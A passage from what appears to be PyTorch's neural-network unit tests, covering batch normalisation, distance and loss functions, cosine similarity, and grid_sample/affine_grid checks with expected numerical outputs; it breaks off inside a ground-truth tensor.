self.assertEqual(mod.bias.grad, ref_mod.bias.grad)
self.assertEqual(input.grad, ref_input.grad)
input = torch.randint(1, 10, (4, 8, 2, 2), dtype=torch.float32, device="cuda")
input = input.contiguous(memory_format=torch.channels_last).detach().requires_grad_()
grad = torch.randint(1, 10, (4, 8, 2, 2), dtype=torch.float32, device="cuda")
grad = grad.contiguous(memory_format=torch.channels_last)
run_test(input, grad)
# see #42588, grad is channels_last contiguous, but grad.suggest_memory_format (rightly) return "contiguous"
# not channels_last
input = torch.randint(1, 10, (2, 8, 8, 1), dtype=torch.float32, device="cuda")
input = input.contiguous(memory_format=torch.channels_last).detach().requires_grad_()
grad = torch.randint(1, 10, (2, 8, 8, 1), dtype=torch.float32, device="cuda")
grad = grad.permute(0, 2, 1, 3)
run_test(input, grad)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_batchnorm_cudnn_half(self):
# THNN
input = torch.randint(1, 10, (2, 3, 2, 2), dtype=torch.half, device="cuda", requires_grad=True)
m = nn.BatchNorm2d(3).half().cuda()
thnn_output = m(input)
thnn_output.sum().backward()
thnn_input_grad = input.grad.data.clone()
self.assertEqualTypeString(thnn_output, input)
# cuDNN
if TEST_CUDNN:
input.grad = None
m = m.float()
cudnn_output = m(input)
cudnn_output.sum().backward()
cudnn_input_grad = input.grad.data.clone()
self.assertEqualTypeString(cudnn_output, input)
self.assertEqual(cudnn_output, thnn_output)
self.assertEqual(cudnn_input_grad, thnn_input_grad, atol=1e-3, rtol=0)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_batchnorm_nonaffine_cuda_half_input(self):
input = torch.randn(16, 3, 24, 24, dtype=torch.half, device="cuda")
m = nn.BatchNorm2d(3, affine=False).cuda().float() # keep running stats in FP32
output = m(input)
self.assertEqualTypeString(output, input)
m.eval()
output = m(input)
self.assertEqualTypeString(output, input)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@repeat_test_for_types([torch.float, torch.half])
def test_batchnorm_large_batch(self, dtype=torch.float):
bn = nn.BatchNorm2d(1).to('cuda', dtype)
data = torch.rand(880801, 1, 1, 1, device="cuda", dtype=dtype)
out = bn(data).sum().backward()
def test_batchnorm_raises_error_if_less_than_one_value_per_channel(self):
x = torch.rand(10)[None, :, None]
with self.assertRaises(ValueError):
torch.nn.BatchNorm1d(10)(x)
def test_batchnorm_raises_error_if_running_mean_is_not_same_size_as_input(self):
input = torch.rand(2, 10)
running_var = torch.rand(10)
wrong_sizes = [9, 11]
for size in wrong_sizes:
with self.assertRaises(RuntimeError):
F.batch_norm(input, torch.rand(size), running_var)
def test_batchnorm_raises_error_if_running_var_is_not_same_size_as_input(self):
input = torch.rand(2, 10)
running_mean = torch.rand(10)
wrong_sizes = [9, 11]
for size in wrong_sizes:
with self.assertRaises(RuntimeError):
F.batch_norm(input, running_mean, torch.rand(size))
def test_batchnorm_raises_error_if_weight_is_not_same_size_as_input(self):
input = torch.rand(2, 10)
running_mean = torch.rand(10)
running_var = torch.rand(10)
wrong_sizes = [9, 11]
for size in wrong_sizes:
with self.assertRaises(RuntimeError):
F.batch_norm(input, running_mean, running_var, weight=Parameter(torch.rand(size)))
def test_batchnorm_raises_error_if_bias_is_not_same_size_as_input(self):
input = torch.rand(2, 10)
running_mean = torch.rand(10)
running_var = torch.rand(10)
wrong_sizes = [9, 11]
for size in wrong_sizes:
with self.assertRaises(RuntimeError):
F.batch_norm(input, running_mean, running_var, bias=Parameter(torch.rand(size)))
def test_batchnorm_buffer_update_when_stats_are_not_tracked(self):
input_size = (32, 4)
# Instantiate BN with buffers that are not None
bn = nn.BatchNorm1d(input_size[1], track_running_stats=True)
# Use buffers for normalization but don't update them
bn.track_running_stats = False
# Store initial values
num_batches = bn.num_batches_tracked.clone()
running_mean = bn.running_mean.clone()
running_var = bn.running_var.clone()
# Forward random tensor
_ = bn(torch.rand(input_size))
# Ensure none of the buffers has been updated
self.assertTrue(torch.equal(num_batches, bn.num_batches_tracked))
self.assertTrue(torch.equal(running_mean, bn.running_mean))
self.assertTrue(torch.equal(running_var, bn.running_var))
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_batchnorm_nhwc_cuda(self):
for dtype in (torch.half, torch.float):
(N, C, H, W) = 2, 64, 50, 50
model = torch.nn.BatchNorm2d(C, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
model = model.eval().cuda().to(dtype)
inp1 = torch.randn(N, C, H, W, device=torch.device('cuda'), dtype=dtype)
inp2 = inp1.contiguous(memory_format=torch.channels_last)
out1 = model(inp1)
out2 = model(inp2)
self.assertTrue(torch.equal(out1, out2))
def test_pairwise_distance(self):
input1 = torch.randn(4, 4, requires_grad=True)
input2 = torch.randn(4, 4, requires_grad=True)
self.assertTrue(gradcheck(lambda x, y: F.pairwise_distance(x, y), (input1, input2)))
def test_pdist(self):
for device, trans in itertools.product(device_(), [False, True]):
inp = torch.randn(4, 5, dtype=torch.double, device=device, requires_grad=True)
if trans:
inp = inp.transpose(0, 1)
for p in [0, 1, 2, 0.5, 1.5, 2.5, float('inf')]:
self.assertTrue(gradcheck(lambda x: F.pdist(x, p), (inp,)))
def test_pdist_zeros(self):
"""Test that grad is still valid when dist is 0"""
for device in device_():
inp = torch.randn(1, 3, dtype=torch.double, device=device, requires_grad=True).repeat([2, 1])
for p in [0, 1, 2, 0.5, 1.5, 2.5, float('inf')]:
self.assertTrue(gradcheck(lambda x: F.pdist(x, p), (inp,)))
def test_pdist_empty_row(self):
for device in device_():
inp = torch.randn(1, 3, dtype=torch.double, device=device, requires_grad=True)
self.assertTrue(gradcheck(F.pdist, (inp,)))
def test_pdist_empty_col(self):
for device in device_():
inp = torch.randn(4, 0, dtype=torch.double, device=device, requires_grad=True)
self.assertTrue(gradcheck(F.pdist, (inp,)))
@unittest.expectedFailure
def test_pdist_cpu_gradgrad_unimplemented(self):
inp = torch.randn(4, 5, requires_grad=True)
gradgradcheck(F.pdist, (inp,))
@unittest.expectedFailure
def test_pdist_cuda_gradgrad_unimplemented(self):
inp = torch.randn(4, 5, device='cuda', requires_grad=True)
gradgradcheck(F.pdist, (inp,))
def test_binary_cross_entropy_grads(self):
import torch.nn.functional as F
for device in device_():
input = torch.rand(3, 3, dtype=torch.double, device=device, requires_grad=True)
target = torch.rand(3, 3, dtype=torch.double, device=device)
gradcheck(F.binary_cross_entropy, [input, target])
gradgradcheck(F.binary_cross_entropy, [input, target])
# now with diffentiable target
target.requires_grad_(True)
gradcheck(F.binary_cross_entropy, [input, target], check_batched_grad=False)
# no double backward for target yet
with self.assertRaisesRegex(RuntimeError, "not implemented"):
gradgradcheck(F.binary_cross_entropy, [input, target], check_batched_grad=False)
def test_cosine_embedding_loss_with_diff_type(self):
for device in device_():
input1 = torch.tensor([[2, 3, 4], [6, 2, 4]], dtype=torch.double, device=device)
input2 = torch.tensor([[2, 3, 5], [3, 2, 1]], dtype=torch.double, device=device)
target = torch.tensor([1, -1], dtype=torch.int, device=device)
expected = torch.nn.functional.cosine_embedding_loss(input1, input2, target)
for dt1 in get_all_math_dtypes(device):
for dt2 in get_all_math_dtypes(device):
for dt3 in get_all_math_dtypes(device):
# dt3 is used as dtype for target = [1, -1], so let's skip unsigned type
if dt3 == torch.uint8:
continue
if dt1.is_complex or dt2.is_complex or dt3.is_complex:
continue
input1 = input1.to(dt1)
input2 = input2.to(dt2)
target = target.to(dt3)
result = torch.nn.functional.cosine_embedding_loss(input1, input2, target)
self.assertEqual(result.item(), expected.item(), atol=0.001, rtol=0)
def test_kl_div_with_diff_type(self):
for device in device_():
input = torch.tensor([[2, 3, 5], [3, 2, 1]], dtype=torch.double, device=device)
target = torch.tensor([[1, 2, 3], [4, 5, 6]], dtype=torch.double, device=device)
expected = torch.nn.functional.kl_div(input, target)
for input_dtype in get_all_math_dtypes(device):
if input_dtype.is_complex:
continue
for target_dtype in [torch.float32, torch.float64, torch.float16]:
if (torch.device(device).type == 'cpu' and target_dtype == torch.float16):
continue
input = input.to(input_dtype)
target = target.to(target_dtype)
result = torch.nn.functional.kl_div(input, target)
self.assertEqual(result.item(), expected.item(), atol=0.001, rtol=0)
def test_kl_div_with_diff_type_log_target(self):
for device in device_():
input = torch.tensor([[2, 3, 5], [3, 2, 1]], dtype=torch.double, device=device)
target = torch.tensor([[1, 2, 3], [4, 5, 6]], dtype=torch.double, device=device).log()
expected = torch.nn.functional.kl_div(input, target, log_target=True)
for input_dtype in get_all_math_dtypes(device):
if input_dtype.is_complex:
continue
for target_dtype in [torch.float32, torch.float64, torch.float16]:
if (torch.device(device).type == 'cpu' and target_dtype == torch.float16):
continue
input = input.to(input_dtype)
target = target.to(target_dtype)
result = torch.nn.functional.kl_div(input, target, log_target=True)
self.assertEqual(result.item(), expected.item(), atol=0.001, rtol=0)
def test_kl_div_log_softmax_target(self):
for device in device_():
a = torch.tensor([[1.0, 2, 3], [5.0, 5, 5]], device=device)
b = torch.tensor([[1.0, 2, 3], [5.0, 5, 5]], device=device)
self.assertEqual(
F.kl_div(F.log_softmax(a, 1), F.log_softmax(b, 1), reduction='none', log_target=True),
torch.zeros_like(a)
)
def test_cosine_embedding_loss_no_reduce(self):
input1 = torch.randn(15, 10, requires_grad=True)
input2 = torch.randn(15, 10, requires_grad=True)
target = torch.randn(15).sign()
self.assertTrue(gradcheck(lambda x, y, z: F.cosine_embedding_loss(
x, y, z, reduction='none'), (input1, input2, target)))
self.assertEqual(F.cosine_embedding_loss(input1, input2, target, reduction='none'),
loss_reference_fns['CosineEmbeddingLoss'](input1, input2, target, reduction='none'))
def test_cosine_embedding_loss_margin_no_reduce(self):
input1 = torch.randn(15, 10, requires_grad=True)
input2 = torch.randn(15, 10, requires_grad=True)
target = torch.randn(15).sign()
self.assertTrue(gradcheck(lambda x, y, z: F.cosine_embedding_loss(
x, y, z, margin=0.5, reduction='none'), (input1, input2, target)))
self.assertEqual(F.cosine_embedding_loss(input1, input2, target, margin=0.5, reduction='none'),
loss_reference_fns['CosineEmbeddingLoss'](input1, input2, target,
margin=0.5, reduction='none'))
def test_cosine_embedding_loss_invalid_target_shape(self):
input1 = torch.randn(15, 10)
input2 = torch.randn(15, 10)
target = torch.randn(15, 1).sign()
with self.assertRaisesRegex(RuntimeError, "1D target tensor expected"):
F.cosine_embedding_loss(input1, input2, target)
def test_margin_ranking_loss_no_reduce(self):
input1 = torch.randn(15).mul_(10).requires_grad_()
input2 = torch.randn(15).mul_(10).requires_grad_()
target = torch.randn(15).sign()
self.assertTrue(gradcheck(lambda x, y, z: F.margin_ranking_loss(
x, y, z, reduction='none'), (input1, input2, target)))
self.assertEqual(F.margin_ranking_loss(input1, input2, target, reduction='none'),
loss_reference_fns['MarginRankingLoss'](input1, input2, target, reduction='none'))
def test_margin_ranking_loss_margin_no_reduce(self):
input1 = torch.randn(15).mul_(10).requires_grad_()
input2 = torch.randn(15).mul_(10).requires_grad_()
target = torch.randn(15).sign()
self.assertTrue(gradcheck(lambda x, y, z: F.margin_ranking_loss(
x, y, z, margin=0.5, reduction='none'), (input1, input2, target)))
self.assertEqual(F.margin_ranking_loss(input1, input2, target, margin=0.5, reduction='none'),
loss_reference_fns['MarginRankingLoss'](input1, input2, target, margin=0.5, reduction='none'))
def test_triplet_margin_loss(self):
input1 = torch.randn(5, 10, requires_grad=True)
input2 = torch.randn(5, 10, requires_grad=True)
input3 = torch.randn(5, 10, requires_grad=True)
self.assertTrue(gradcheck(lambda x1, x2, x3: F.triplet_margin_loss(
x1, x2, x3), (input1, input2, input3)))
self.assertEqual(F.triplet_margin_loss(input1, input2, input3),
loss_reference_fns['TripletMarginLoss'](input1, input2, input3))
def test_triplet_margin_loss_swap(self):
input1 = torch.randn(5, 10, requires_grad=True)
input2 = torch.randn(5, 10, requires_grad=True)
input3 = torch.randn(5, 10, requires_grad=True)
self.assertTrue(gradcheck(lambda x1, x2, x3: F.triplet_margin_loss(
x1, x2, x3, swap=True), (input1, input2, input3)))
self.assertEqual(F.triplet_margin_loss(input1, input2, input3, swap=True),
loss_reference_fns['TripletMarginLoss'](input1, input2, input3, swap=True))
def test_triplet_margin_loss_no_reduce(self):
input1 = torch.randn(5, 10, requires_grad=True)
input2 = torch.randn(5, 10, requires_grad=True)
input3 = torch.randn(5, 10, requires_grad=True)
self.assertTrue(gradcheck(lambda x1, x2, x3: F.triplet_margin_loss(
x1, x2, x3, reduction='none'), (input1, input2, input3)))
self.assertEqual(F.triplet_margin_loss(input1, input2, input3, reduction='none'),
loss_reference_fns['TripletMarginLoss'](input1, input2, input3, reduction='none'))
def test_triplet_margin_loss_swap_no_reduce(self):
input1 = torch.randn(5, 10, requires_grad=True)
input2 = torch.randn(5, 10, requires_grad=True)
input3 = torch.randn(5, 10, requires_grad=True)
self.assertTrue(gradcheck(lambda x1, x2, x3: F.triplet_margin_loss(
x1, x2, x3, swap=True, reduction='none'), (input1, input2, input3)))
self.assertEqual(F.triplet_margin_loss(input1, input2, input3, swap=True, reduction='none'),
loss_reference_fns['TripletMarginLoss'](input1, input2, input3, swap=True, reduction='none'))
def test_pointwise_loss_target_grad_none_reduction(self):
i = torch.randn(5, 10)
t = torch.randn(5, 10, requires_grad=True)
self.assertEqual(F.mse_loss(i, t, reduction='none').size(), t.size())
self.assertEqual(F.l1_loss(i, t, reduction='none').size(), t.size())
def test_pointwise_loss_broadcast(self):
losses = {
'mse_loss': lambda x, y, r: F.mse_loss(x, y, reduction=r),
'l1_loss': lambda x, y, r: F.l1_loss(x, y, reduction=r),
'smooth_l1_loss': lambda x, y, r: F.smooth_l1_loss(x, y, reduction=r),
'huber_loss': lambda x, y, r: F.huber_loss(x, y, reduction=r),
}
input = torch.randn(2, 1, requires_grad=True)
for _name, fn in losses.items():
for requires_grad in [True, False]:
# When target.requires_grad=True, its impl is in Python, while the other is in TH.
target = torch.randn(2, 10, requires_grad=requires_grad)
for reduction in ['none', 'mean', 'sum']:
l = fn(input, target, reduction)
if reduction == 'none':
self.assertEqual(l.size(), target.size())
self.assertTrue(gradcheck(fn, (input, target, reduction)))
# https://github.com/pytorch/pytorch/issues/27692 reports
# that l1_loss get a wrong result for big batch size
def test_l1_loss_correct(self):
for dtype in [torch.float, torch.cfloat]:
for N in range(1, 50, 10):
input = torch.rand(N, 3, 1024, 1024, dtype=dtype)
self.assertEqual(
torch.nn.L1Loss()(input, torch.zeros_like(input)),
input.abs().mean())
def test_smoothl1loss_intergral_target(self):
def _input_grad(input, target, reduction):
output = F.smooth_l1_loss(input, target, reduction=reduction, beta=0.5)
output.sum().backward()
return input.grad
for device, dtype, reduction in product(device_(),
integral_types(),
('none', 'sum', 'mean')):
input = torch.randn(2, 2, device=device, requires_grad=True)
target = torch.randint(0, 9, (2, 2), device=device, dtype=dtype)
input_grad_with_float_target = _input_grad(input, target.float(), reduction)
input_grad = _input_grad(input.detach().clone().requires_grad_(True),
target,
reduction)
self.assertEqual(input_grad, input_grad_with_float_target)
def test_smoothl1loss_negative_beta_not_supported(self):
with self.assertRaises(RuntimeError):
F.smooth_l1_loss(torch.randn(2, 2), torch.randn(2, 2), beta=-1.0)
def test_huber_loss_invalid_delta(self):
def _test_huber_loss_delta_error_helper(delta):
input, target = torch.randn(2, 2), torch.randn(2, 2)
loss = torch.nn.HuberLoss(delta=delta)
with self.assertRaises(RuntimeError):
loss(input, target)
def test_huber_loss_negative_delta():
_test_huber_loss_delta_error_helper(delta=-0.5)
def test_huber_loss_zero_delta():
_test_huber_loss_delta_error_helper(delta=0.0)
test_huber_loss_negative_delta()
test_huber_loss_zero_delta()
def test_cosine_similarity(self):
# Check cosine_similarity input/output shapes
input_size = (1, 3, 2, 1)
expected_size = (1, 2, 1)
input1 = torch.randn(input_size, requires_grad=True)
input2 = torch.randn(input_size, requires_grad=True)
self.assertEqual(F.cosine_similarity(input1, input2, dim=1).size(), expected_size)
# Check numerical precision, issue #18057
vv1 = torch.tensor(list([float(i) for i in range(84)])).unsqueeze(0)
vv2 = torch.tensor(list([float(i) for i in range(84)])).unsqueeze(0)
out = F.cosine_similarity(vv1, vv2)
self.assertLessEqual(out, 1.0)
# Check dividing by 0.
input1 = torch.randn(10).requires_grad_()
input2 = torch.zeros_like(input1).requires_grad_()
torch.cosine_similarity(input1, input2, 0).sum().backward()
self.assertEqual(input1.grad, torch.zeros_like(input1))
self.assertEqual(input2.grad, input1 * 1e8)
# Check error when inputs are not the same shape
input1 = torch.randn(2, 2, 1)
input2 = torch.randn(2, 1, 3)
with self.assertRaises(RuntimeError):
F.cosine_similarity(input1, input2)
# Check type promotion, issue #61454
input = torch.tensor(12.)
out = F.cosine_similarity(input.to(torch.int8), input, dim=-1)
self.assertEqual(out, 1.)
def test_grid_sample_error_checking(self):
input = torch.empty(1, 1, 2, 2)
grid = torch.empty(1, 1, 1, 2)
# assert no error
F.grid_sample(input, grid, align_corners=False)
with self.assertRaisesRegex(ValueError, "but got: 'garbage'"):
F.grid_sample(input, grid, mode='garbage', align_corners=False)
with self.assertRaisesRegex(ValueError, "but got: 'garbage'"):
F.grid_sample(input, grid, padding_mode='garbage', align_corners=False)
with self.assertRaisesRegex(RuntimeError, "expected input and grid to have same dtype"):
F.grid_sample(input.float(), grid.double(), align_corners=False)
with self.assertRaisesRegex(RuntimeError, "expected 4D or 5D input"):
F.grid_sample(input[0], grid, align_corners=False)
with self.assertRaisesRegex(RuntimeError, "grid with same number of dimensions"):
F.grid_sample(input, torch.empty(1, 1, 1, 1, 3), align_corners=False)
with self.assertRaisesRegex(RuntimeError, "expected grid and input to have same batch size"):
F.grid_sample(input, torch.empty(2, 1, 1, 2), align_corners=False)
with self.assertRaisesRegex(RuntimeError, "expected grid to have size 2 in last dimension"):
F.grid_sample(input, torch.empty(1, 1, 1, 3), align_corners=False)
with self.assertRaisesRegex(RuntimeError, "expected input to have non-empty spatial dimensions"):
F.grid_sample(torch.empty(1, 1, 0, 2), grid, align_corners=False)
with self.assertRaisesRegex(RuntimeError, "bicubic interpolation only supports 4D input"):
F.grid_sample(torch.empty(1, 1, 2, 2, 2), torch.empty(1, 1, 1, 1, 3), mode='bicubic')
if TEST_CUDA:
with self.assertRaisesRegex(RuntimeError, "expected input and grid to be on same device"):
F.grid_sample(input.cuda(), grid, align_corners=False)
def test_affine_grid_error_checking(self):
# 2D affine
theta = torch.empty(1, 2, 3, dtype=torch.double)
size = torch.Size([1, 1, 2, 2])
# assert no error
F.affine_grid(theta, size, align_corners=False)
# check for warning for empty span along dimension
with warnings.catch_warnings(record=True) as w:
# Ensure warnings are being shown
warnings.simplefilter("always")
# Should not trigger warning
F.affine_grid(theta, torch.Size([1, 1, 2, 1]), align_corners=False)
# Check no warning occurs
self.assertNotIn('See the documentation of affine_grid for details.', ' '.join(map(str, w)))
# Should trigger warning
F.affine_grid(theta, torch.Size([1, 1, 2, 1]), align_corners=True)
# Check warning occurs
self.assertIn('See the documentation of affine_grid for details.', ' '.join(map(str, w)))
with self.assertRaisesRegex(ValueError, "Expected theta to have floating point type"):
F.affine_grid(theta.int(), size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 2D affine matrices of shape Nx2x3"):
F.affine_grid(theta[0], size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 2D affine matrices of shape Nx2x3"):
F.affine_grid(theta.unsqueeze(0), size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 2D affine matrices of shape Nx2x3"):
F.affine_grid(theta.repeat(1, 2, 1), size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 2D affine matrices of shape Nx2x3"):
F.affine_grid(theta.repeat(1, 1, 2), size, align_corners=False)
# 3D affine
theta = torch.empty(1, 3, 4, dtype=torch.double)
size = torch.Size([1, 1, 2, 2, 2])
# assert no error
F.affine_grid(theta, size, align_corners=False)
# check for warning for empty span along dimension
with warnings.catch_warnings(record=True) as w:
# Ensure warnings are being shown
warnings.simplefilter("always")
# Should not trigger warning
F.affine_grid(theta, torch.Size([1, 1, 3, 2, 1]), align_corners=False)
# Check no warning occurs
self.assertNotIn('See the documentation of affine_grid for details.', ' '.join(map(str, w)))
# Should trigger warning
F.affine_grid(theta, torch.Size([1, 1, 3, 2, 1]), align_corners=True)
# Check warning occurs
self.assertIn('See the documentation of affine_grid for details.', ' '.join(map(str, w)))
with self.assertRaisesRegex(ValueError, "Expected a batch of 3D affine matrices of shape Nx3x4"):
F.affine_grid(theta[0], size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 3D affine matrices of shape Nx3x4"):
F.affine_grid(theta.unsqueeze(0), size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 3D affine matrices of shape Nx3x4"):
F.affine_grid(theta.repeat(1, 2, 1), size, align_corners=False)
with self.assertRaisesRegex(ValueError, "Expected a batch of 3D affine matrices of shape Nx3x4"):
F.affine_grid(theta.repeat(1, 1, 2), size, align_corners=False)
with self.assertRaisesRegex(NotImplementedError, "affine_grid only supports 4D and 5D sizes"):
F.affine_grid(theta, torch.Size([1, 2, 2]), align_corners=False)
with self.assertRaisesRegex(NotImplementedError, "affine_grid only supports 4D and 5D sizes"):
F.affine_grid(theta, torch.Size([1, 1, 2, 2, 2, 2]), align_corners=False)
@skipIfRocm
def test_grid_sample(self):
def test(N, C, H, W, mode, padding_mode, align_corners):
def test_shape(N, C, IH, IW, H, W, mode, padding_mode, align_corners):
for grid_dim_contig_order in [(0, 1, 2, 3), (0, 3, 1, 2), (3, 0, 1, 2), (0, 2, 1, 3)]:
# grid_dim_contig_order specifies the dimension order that can
# make grid to be contiguous.
# i.e., grid.permute(grid_dim_contig_order) is contiguous.
# e.g., with grid_dim_contig_order=[0, 3, 1, 2], grid should be
# initialized with contiguous tensor of shape [N, 2, H, W]
# and permuted to [N, H, W, 2] afterwards.
grid_shape = [N, H, W, 2]
grid_init_shape = [grid_shape[d] for d in grid_dim_contig_order]
grid_fwd_permute = [None, None, None, None]
for i, d in enumerate(grid_dim_contig_order):
grid_fwd_permute[d] = i
def get_grid(device='cpu', data=None):
if data is not None:
assert list(data.shape) == grid_shape
data = data.permute(grid_dim_contig_order).to(device)
else:
data = torch.randn(grid_init_shape, device=device)
grid = data.permute(grid_fwd_permute)
assert grid.permute(grid_dim_contig_order).is_contiguous()
return grid
input_cpu = torch.randn(C, N, IH, IW).transpose(0, 1).requires_grad_()
grid_cpu = get_grid().requires_grad_()
out_cpu = F.grid_sample(input_cpu, grid_cpu, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertTrue(out_cpu.size() == torch.Size([N, C, H, W]))
gradients = torch.randn_like(out_cpu)
out_cpu.backward(gradients)
# Compare against unvectorized CPU fallback
# NOTE [ grid_sample CPU fallback ]
# grid_sample uses AVX for 2d images, but that requires 32-bit indexing for
# 32-bit floats. So we also have a fallback that is used only for float tensors
# requiring 64-bit indexing. That requires too much memory to run on CI, so we
# also export the fallback and test it here to ensure feature parity with
# the vectorized version.
input_fallback = input_cpu.float().detach_().requires_grad_()
grid_fallback = grid_cpu.float().detach_().requires_grad_()
out_fallback = torch._grid_sampler_2d_cpu_fallback(
input_fallback, grid_fallback,
F.GRID_SAMPLE_INTERPOLATION_MODES[mode],
F.GRID_SAMPLE_PADDING_MODES[padding_mode],
align_corners)
self.assertEqual(out_fallback, out_cpu.float(), atol=1e-5, rtol=5e-5)
out_fallback.backward(gradients.float())
self.assertEqual(input_fallback.grad, input_cpu.grad.float(), atol=1e-4, rtol=5e-5)
self.assertEqual(grid_fallback.grad, grid_cpu.grad.float(), atol=1e-4, rtol=5e-5)
if TEST_CUDA:
input_cuda = input_cpu.detach().transpose(0, 1).cuda().transpose(0, 1).requires_grad_()
grid_cuda = get_grid('cuda', grid_cpu.detach()).requires_grad_()
out_cuda = F.grid_sample(input_cuda, grid_cuda, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertEqual(out_cpu, out_cuda)
out_cuda.backward(gradients.cuda())
self.assertEqual(input_cpu.grad, input_cuda.grad)
self.assertEqual(grid_cpu.grad, grid_cuda.grad, atol=5e-5, rtol=0)
# check that zero-dimensional input strides don't error out
base_input = torch.randn(N, C, 1, IW)
input_cpu = base_input.expand_as(input_cuda).requires_grad_()
out_cpu = F.grid_sample(input_cpu, grid_cpu, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
input_cuda = base_input.cuda().expand_as(input_cuda).requires_grad_()
out_cuda = F.grid_sample(input_cuda, grid_cuda, mode=mode, padding_mode=padding_mode,
align_corners=align_corners)
self.assertEqual(out_cpu, out_cuda)
# test same size output
test_shape(N, C, H, W, H, W, mode, padding_mode, align_corners)
# test larger output
N = random.randint(2, 8)
C = random.randint(2, 8)
IH = random.randint(2, 8)
IW = random.randint(2, 8)
H = random.randint(IH + 1, 12)
W = random.randint(IW + 1, 12)
test_shape(N, C, IH, IW, H, W, mode, padding_mode, align_corners)
# test smaller output
N = random.randint(2, 8)
C = random.randint(2, 8)
IH = random.randint(2, 8)
IW = random.randint(2, 8)
H = random.randint(2, IH)
W = random.randint(2, IW)
test_shape(N, C, IH, IW, H, W, mode, padding_mode, align_corners)
# test 1x1 inpput
N = random.randint(2, 8)
C = random.randint(2, 8)
IH = 1
IW = 1
H = random.randint(2, 5)
W = random.randint(2, 5)
test_shape(N, C, IH, IW, H, W, mode, padding_mode, align_corners)
# testing empty grid
N = random.randint(2, 8)
C = random.randint(2, 8)
IH = random.randint(2, 8)
IW = random.randint(2, 8)
W = random.randint(3, IW + 2)
test_shape(N, C, IH, IW, 0, W, mode, padding_mode, align_corners)
# testing empty channel
N = random.randint(2, 8)
IH = random.randint(2, 8)
IW = random.randint(2, 8)
H = random.randint(3, IH + 2)
W = random.randint(3, IW + 2)
test_shape(N, 0, IH, IW, H, W, mode, padding_mode, align_corners)
# testing empty batch
C = random.randint(2, 8)
IH = random.randint(2, 8)
IW = random.randint(2, 8)
H = random.randint(3, IH + 2)
W = random.randint(3, IW + 2)
test_shape(0, C, IH, IW, H, W, mode, padding_mode, align_corners)
for mode in ('bilinear', 'nearest', 'bicubic'):
for padding_mode in ('zeros', 'border', 'reflection'):
for align_corners in (True, False):
# test known input on CPU
input = torch.arange(1., 11).view(1, 1, 2, 5)
grid = torch.tensor(
[[[-0.9, -4.1], [0, 0.2000], [1, -1], [-0.333, 1e-6], [0.5, 1.0]],
[[-1.0, -0.5], [0, 0.3333], [1, -1], [-0.200, 1e-6], [1.5, 0.5]]]).view(1, 2, 5, 2)
if mode == 'bilinear':
if padding_mode == 'zeros':
if align_corners:
groundtruth = torch.tensor(
[[0.0000, 6.0000000000, 5.0000, 4.8340, 9.0000],
[2.2500, 6.3332500450, 5.0000, 5.1000, 0.0000]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[0.0000, 6.5000000000, 1.2500, 4.6675000191, 4.6250],
[0.5000, 7.1665000916, 1.2500, 5.0000000000, 0.0000]]).view(1, 1, 2, 5)
elif padding_mode == 'border':
if align_corners:
groundtruth = torch.tensor(
[[1.2000, 6.0000000000, 5.0000, 4.8340, 9.0000],
[2.2500, 6.3332500450, 5.0000, 5.1000, 8.7500]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[1.0000, 6.5000000000, 5.0000, 4.6675000191, 9.2500],
[1.0000, 7.1665000916, 5.0000, 5.0000000000, 10.0000]]).view(1, 1, 2, 5)
elif padding_mode == 'reflection':
if align_corners:
groundtruth = torch.tensor(
[[3.4500, 6.0000000000, 5.0000, 4.8340, 9.0000],
[2.2500, 6.3332500450, 5.0000, 5.1000, 7.7500]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[3.0000004768, 6.5000000000, 5.0000, 4.6675000191, 9.2500],
[1.0000000000, 7.1665000916, 5.0000, 5.0000000000, 9.2500]]).view(1, 1, 2, 5)
else:
raise AssertionError("missing groundtruth test for padding mode '{}'".format(padding_mode))
elif mode == 'nearest':
if padding_mode == 'zeros':
if align_corners:
groundtruth = torch.tensor(
[[0., 8., 5., 7., 9.],
[1., 8., 5., 8., 0.]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[0., 8., 5., 7., 0.],
[1., 8., 5., 8., 0.]]).view(1, 1, 2, 5)
elif padding_mode == 'border':
if align_corners:
groundtruth = torch.tensor(
[[1., 8., 5., 7., 9.],
[1., 8., 5., 8., 10.]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[1., 8., 5., 7., 9.],
[1., 8., 5., 8., 10.]]).view(1, 1, 2, 5)
elif padding_mode == 'reflection':
if align_corners:
groundtruth = torch.tensor(
[[1., 8., 5., 7., 9.],
[1., 8., 5., 8., 9.]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[1., 8., 5., 7., 9.],
[1., 8., 5., 8., 9.]]).view(1, 1, 2, 5)
else:
raise AssertionError("missing groundtruth test for padding mode '{}'".format(padding_mode))
elif mode == 'bicubic':
if padding_mode == 'zeros':
if align_corners:
groundtruth = torch.tensor(
[[-0.10424726, 7.1400003, 5.0000, 5.7842274, 9.0000],
[2.4492188, 7.4814040, 5.0000, 6.0277520, 0.0000]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[0.00000, 7.6287503, 1.0625, 5.5977230, 5.3270264],
[0.40625, 8.0288770, 1.0625, 5.9375067, -0.3515625]]).view(1, 1, 2, 5)
elif padding_mode == 'border':
if align_corners:
groundtruth = torch.tensor(
[[1.1520010, 6.0599990, 5.0000, 4.870930, 9.0000000],
[2.1328125, 6.4258375, 5.0000, 5.076003, 8.8671875]]).view(1, 1, 2, 5)
else:
groundtruth = torch.tensor(
[[0.894531, 6.6050020, 4.625, 4.7138715, 9.800781],
